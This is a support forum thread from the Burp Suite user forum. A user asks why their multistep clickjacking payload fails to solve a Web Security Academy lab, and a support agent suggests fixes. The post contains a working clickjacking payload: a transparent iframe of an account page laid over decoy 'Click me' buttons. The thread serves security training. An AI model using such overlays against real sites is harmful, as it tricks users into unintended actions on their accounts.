Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

[Lab] Multistep clickjacking not being solved

dnishioka | Last updated: Sep 04, 2024 01:00PM UTC

I followed that solution and the community solution, but that lab did not solve the problem. We are using BurpSuite's Chromium to verify the operation. I need you to tell me what you need to do to resolve this. The following payloads are used. ------ <style> iframe { position:relative; width:1000px; height: 800px; opacity:0; z-index: 2; } .firstClick, .secondClick { position:absolute; top:540px; left:65px; z-index: 1; } .secondClick { top:310px; left:200px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://0a96004503fe5fff80065367008f00b1.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Sep 05, 2024 07:02AM UTC

Hi, A couple of things to check: If you use the 'View exploit' functionality within the lab do the div elements line up with the corresponding buttons? Secondly, which version of Burp are you using when you attempt this lab - there were some issues with these labs when you used the embedded browser in older versions of Burp but this should now work in the latest version of Burp using the updated version of Chromium that the embedded browser is based on.

dnishioka | Last updated: Sep 07, 2024 08:42PM UTC